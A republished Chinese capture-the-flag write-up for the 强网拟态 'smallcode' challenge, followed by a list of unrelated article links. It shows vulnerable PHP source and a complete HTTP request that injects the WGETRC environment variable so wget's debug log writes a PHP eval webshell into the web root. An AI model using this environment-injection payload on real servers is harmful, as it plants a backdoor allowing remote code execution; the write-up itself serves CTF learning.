startctf环境变量注入及强网拟态smallcode特殊解法

news/2025/11/6 22:31:06/文章来源:https://www.cnblogs.com/rycarl/p/19197863

之前打强网拟态遇到了环境变量注入的题,看其他师傅都是用自己的VPS作为代理服务器。

这里我想给出一个自己的打法,可以在靶机不出网的条件下写入webshell

下面是题目源码

<?phphighlight_file(__FILE__);if(isset($_POST['context'])){$context = $_POST['context'];file_put_contents("1.txt",base64_decode($context));}
logfileif(isset($_POST['env'])){$env = $_POST['env'];putenv($env);}system("wget --content-disposition -N fmyyy");

WGETRC环境变量指定为1.txt
然后我查阅官方手册发现一个logfile的参数
可以指定log文件,然后我们就想办法让文件里面包含php一句话木马
查阅后发现存在debug模式和post_data参数
这两个结合在一起就可以让日志文件输出post_data的参数
组合起来就可以做到不出网写webshell
1.txt的内容

debug = on
logfile = /home/rycarl/PhpstormProjects/xctf/aaa.php
post_data = '<?php @eval($_POST['123']); ?>'

所以最后的payload是

POST / HTTP/1.1
Host: web-91b2977d28.challenge.xctf.org.cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Edg/141.0.0.0
Origin: http://web-91b2977d28.challenge.xctf.org.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://web-91b2977d28.challenge.xctf.org.cn/
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Length: 105context=ZGVidWcgPSBvbgpsb2dmaWxlID0gL3Zhci93d3cvaHRtbC93ZWJzaGVsbC5waHAKcG9zdF9kYXRhID0gJzw/cGhwIEBldmFsKCRfUE9TVFsnMTIzJ10pOyA/Pic=&env=WGETRC%3D%2Fvar%2Fwww%2Fhtml%2F1.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/958159.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Spring ApplicationEventPublisher 事件发布

Spring ApplicationEventPublisher 事件发布

ApplicationEventPublisher ApplicationEventPublisher是一个事件发布器,我们可以通过ApplicationContext来发布一个相应的事件 主要涉及到 事件定义、事件发布、事件订阅 三个模块 demo 事件 需要继承org.springfram…
阅读更多...
NOIP模拟赛20251106 T4 CF1270H

NOIP模拟赛20251106 T4 CF1270H

题目大意: 定义一个序列 \(a\) 的 \(f(a)\) 表示,将所有 \(i < j, a_{i} < a_{j}\) 连边后的连通块数量。 单点修,每次查询全局的 \(f\) 值。 解题思路: 不知道为啥,我感觉这个题像 CF2147F。 考虑每个连通…
阅读更多...
详细介绍:电阻的分类与应用

详细介绍:电阻的分类与应用

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
题解:CF2121E Sponsor of Your Problems

题解:CF2121E Sponsor of Your Problems

不知何时的模拟赛收录了此题嗯对发现自己的专栏里有,遂搬运。 题目简述 定义 \(f(a, b)\) 表示这两个数的十进制下数字相同的位数,如 \(f(21,12) = 0\),\(f(54321, 24361) = 3\)。 给两个位数相同的十进制数 \(l\) …
阅读更多...
wepoc Nuclei 漏洞扫描器图形界面工具

wepoc Nuclei 漏洞扫描器图形界面工具

一款图形化的nuclei POC 管理工具🛡️ wepoc Nuclei 漏洞扫描器图形界面工具🚀 基于 Wails v2 框架的 Nuclei 漏洞扫描器图形界面工具 专为安全研究人员和渗透测试工程师设计 Github: https://github.com/cyber0s/…
阅读更多...
Python实现数据可视化用Matplotlib轻松创建专业级图表 - 指南

Python实现数据可视化用Matplotlib轻松创建专业级图表 - 指南

Python实现数据可视化用Matplotlib轻松创建专业级图表 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Cons…
阅读更多...
Python因果分析选哪个?六个贝叶斯推断库实测对比(含代码示例)

Python因果分析选哪个?六个贝叶斯推断库实测对比(含代码示例)

Python 生态里能用的因果库有很多选哪个往往要看你对模型的理解程度,以及项目对“可解释性”的要求。这篇文章将对比了六个目前社区中最常用的因果推断库:Bnlearn、Pgmpy、CausalNex、DoWhy、PyAgrum 和 CausalImpac…
阅读更多...
题解:CF2121B Above the Clouds

题解:CF2121B Above the Clouds

不知何时的模拟赛收录了此题不知道是什么时候的事了反正看到了粘一下算了。 思路 首先我们注意到只要 \(b\) 是 \(a + c\) 的子串即可,不需要考虑长度,那么我们可以只考虑 \(b\) 的长度为 1 情况。 可以将每个字符出…
阅读更多...
实用指南:学习日报 20251007|深度解析:基于 Guava LoadingCache 的优惠券模板缓存设计与实现

实用指南:学习日报 20251007|深度解析:基于 Guava LoadingCache 的优惠券模板缓存设计与实现

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
选择 Tita 新绩效一体化的 5 大理由

选择 Tita 新绩效一体化的 5 大理由

在企业绩效管理从 “单一考核” 向 “价值驱动” 转型的当下,Tita 新绩效一体化解决方案凭借对绩效管理全链路的深度重构,以五大核心优势助力企业打破绩效孤岛,实现管理效能与组织活力的双重提升。 1. 战略与绩效深…
阅读更多...
csv的pandas包处理基础操作整理,以处理气象站点数据为例

csv的pandas包处理基础操作整理,以处理气象站点数据为例

处理csv文件,同样将结果保存为csv文件,只涉及数据不涉及Excel文件的格式,主要使用pandas包就足够了。以我自己的任务为主,串一串基础语句进行总结。 1、读取csv文件 import pandas as pd import numpy as np impor…
阅读更多...
NOIP模拟赛20251106 T3

NOIP模拟赛20251106 T3

题目大意: 有一个长度为 \(n\) 的序列,每次你会单点修改,求每次修改完了之后的 \(f\)。 \(f\) 表示最少操作几次冒泡,使得他不降。 \(n,q \le 5 \times 10^5\) 解题思路: 考虑刻画这个东西,由于每次对于一个非前…
阅读更多...
Tomassi计算机

Tomassi计算机

请分析计算机检材,找出嫌疑人计算机主要的登录用户(答案格式:Administrator) Tomasi请分析计算机检材,嫌疑人计算机操作系统的注册所有者是?(答案格式:Administrator) Windows 用户请分析计算机检材,嫌疑人计…
阅读更多...
团队第一次作业

团队第一次作业

软件工程第一次实践作业软件工程实践 https://edu.cnblogs.com/campus/fzu/202501SoftwareEngineering作业要求 https://edu.cnblogs.com/campus/fzu/202501SoftwareEngineering/homework/13573作业的目标 自主选题,选…
阅读更多...
20251106周四日记

20251106周四日记

20251106周四日记昨天问D老师的特征提取很有收获,很多之前深度学习的知识想通了,结合多维度线性代数的知识。VAE Diffusion原理值得一看。 今日: 1.早上在家试衣服,中午吃完午饭等爹回来看豆子,回学校直接去实验室…
阅读更多...
学习:初学BP

学习:初学BP

支付漏洞 例如navicat软件的官网 1.打开BP,用BP内部浏览器打开2.在进入付款界面前用BP进行拦截3.最后放行即可成功
阅读更多...
2025年上海防水补漏TOP5最新评测:从屋顶到地下室,全场景解决

2025年上海防水补漏TOP5最新评测:从屋顶到地下室,全场景解决

随着城市化进程加快,建筑防水补漏需求日益增长,上海作为国际化大都市,对防水工程的专业性、可靠性提出了更高要求。本榜单基于技术实力、服务覆盖、施工质量、客户口碑、资质认证五大维度,结合2024年行业数据及客户…
阅读更多...
线段树维护区间历史信息和为例的复杂信息维护同标记下传设计技巧简记

线段树维护区间历史信息和为例的复杂信息维护同标记下传设计技巧简记

简记线段树维护区间历史信息和为例的复杂信息维护同标记下传设计技巧并给出例题示范实现过程与代码实现示例。更新日志 2025/11/06:开工。思路 单次影响与维护信息 首先考虑每一种修改操作单次对信息的影响,特殊地,…
阅读更多...
每日总结(三)

每日总结(三)

11.6
阅读更多...
DFS 序

DFS 序

思想对于树结构,通常包括进入节点和离开节点的两次记录(即时间戳),形成一个长度为2N的序列(N为节点数)。性质子树连续性‌:同一子树的节点在DFS序中形成连续区间。例如,根节点的子树区间包含所有子节点的访问记…
阅读更多...
最新文章

Copyright @ 2022~2023